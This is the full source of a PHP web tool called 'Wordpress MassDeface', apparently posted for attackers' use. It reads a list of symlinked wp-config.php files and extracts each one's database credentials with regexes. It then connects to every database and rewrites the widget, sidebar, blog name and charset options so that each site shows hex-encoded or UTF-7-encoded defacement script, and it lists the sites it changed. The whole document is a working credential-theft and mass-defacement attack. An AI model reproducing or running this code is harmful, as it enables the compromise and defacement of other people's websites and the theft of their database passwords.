Wordpress MassDeface(Coded By RAB3OUN)

1. <title>Wordpress MassDeface(Coded By RAB3OUN)</title>
2. <style>
3. body
4. {
5.     background: #0f0e0d;
6.     color: #FF9933;
7.     padding: 0px;
8. }
9. a:link, body_alink
10. {
11.     color: #FF9933;
12.     text-decoration: none;
13. }
14. a:visited, body_avisited
15. {
16.     color: #FF9933;
17.     text-decoration: none;
18. }
19. a:hover, a:active, body_ahover
20. {
21.     color: #FFFFFF;
22.     text-decoration: none;
23. }
24. td, th, p, li,table
25. {
26.    
27.     background: #2e2b28;
28.     border:1px solid #524f46;
29. }
30. input
31. {
32.     border: 1px solid;
33.     cursor: default;
34.    
35.     overflow: hidden;
36.     background: #2e2b28;
37.     color: #ffffff;
38. }textarea
39. {
40.     border: 1px solid;
41.     cursor: default;
42.    
43.     overflow: hidden;
44.     background: #2e2b28;
45.     color: #ffffff;
46. }
47. button
48. {
49.     border: 1px solid;
50.     cursor: default;
51.    
52.     overflow: hidden;
53.     background: #2e2b28;
54.     color: #ffffff;
55. }
56. </style>
57. </head>
58.  
59. <body bgcolor="black">
60. <center>
61. <pre>
62. __          __      __  __                 _____        __              
63. \ \        / /     |  \/  |               |  __ \      / _|              
64.  \ \  /\  / / __   | \  / | __ _ ___ ___  | |  | | ___| |_ __ _  ___ ___
65.   \ \/  \/ / '_ \  | |\/| |/ _` / __/ __| | |  | |/ _ \  _/ _` |/ __/ _ \
66.    \  /\  /| |_) | | |  | | (_| \__ \__ \ | |__| |  __/ || (_| | (_|  __/
67.     \/  \/ | .__/  |_|  |_|\__,_|___/___/ |_____/ \___|_| \__,_|\___\___|
68.            | |                                                          
69.            |_|                                                          
70. </pre>
71. </center>
72. <form method="POST" action="" >
73. <center>
74. <table border='1'><tr><td>List of All Symlink</td><td>
75. <input type="text" name="url" size="100" value="list.txt"></td></tr>
76. <tr><td>Index</td><td>
77. <textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
78. <br><br><input type="Submit" name="Submit" value="Submit">
79. <input type="hidden" name="action" value="1"></form>
80. </center>
81. <?
82. set_time_limit(0);
83. if ($_POST['action']=='1'){
84. $url=$_POST['url'];
85. $users=@file($url);
86.  
87.  
88. if (count($users)<1) exit("<h1>No config found</h1>");
89. foreach ($users as $user) {
90. $user1=trim($user);
91. $code=file_get_contents2($user1);
92. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
93. $db=$b1[1][0];
94. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
95. $user=$b2[1][0];
96. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
97. $db_password=$b3[1][0];
98. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
99. $host=$b4[1][0];
100. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
101. $p=$b5[1][0];
102.  
103.  
104. $d=@mysql_connect( $host, $user, $db_password ) ;
105. if ($d){
106. @mysql_select_db($db );
107. $source=stripslashes($_POST['index']);
108. $s2=strToHex(($source));
109. $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
110. $ls=strlen($s)-2;
111. $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
112. mysql_query($sql) ;
113. $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
114. mysql_query($sql) ;
115. if (function_exists("mb_convert_encoding") )
116. {
117. $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
118. $source2=mysql_real_escape_string($source2);
119. $sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
120. @mysql_query($sql) ; ;
121. $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
122. @mysql_query($sql) ; ;
123. }
124. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
125. $siteurl=@mysql_fetch_array($aa) ;
126. $siteurl=$siteurl['option_value'];
127. $tr.="$siteurl\n";
128. mysql_close();
129. }
130. }
131. if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
132. }
133. function strToHex($string)
134. {
135.     $hex='';
136.     for ($i=0; $i < strlen($string); $i++)
137.     {
138.     if (strlen(dechex(ord($string[$i])))==1){
139.         $hex .="%0". dechex(ord($string[$i]));
140.         }
141.         else
142.         {
143.         $hex .="%". dechex(ord($string[$i]));
144.         }
145.     }
146.     return $hex;
147. }
148.  
149. function file_get_contents2($u){
150.  
151.     $ch = curl_init();
152.     curl_setopt($ch,CURLOPT_URL,$u);
153.     curl_setopt($ch, CURLOPT_HEADER, 0);    
154.    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
155.     curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
156.         $result = curl_exec($ch);
157.     return $result ;
158.     }
159.    
160. ?>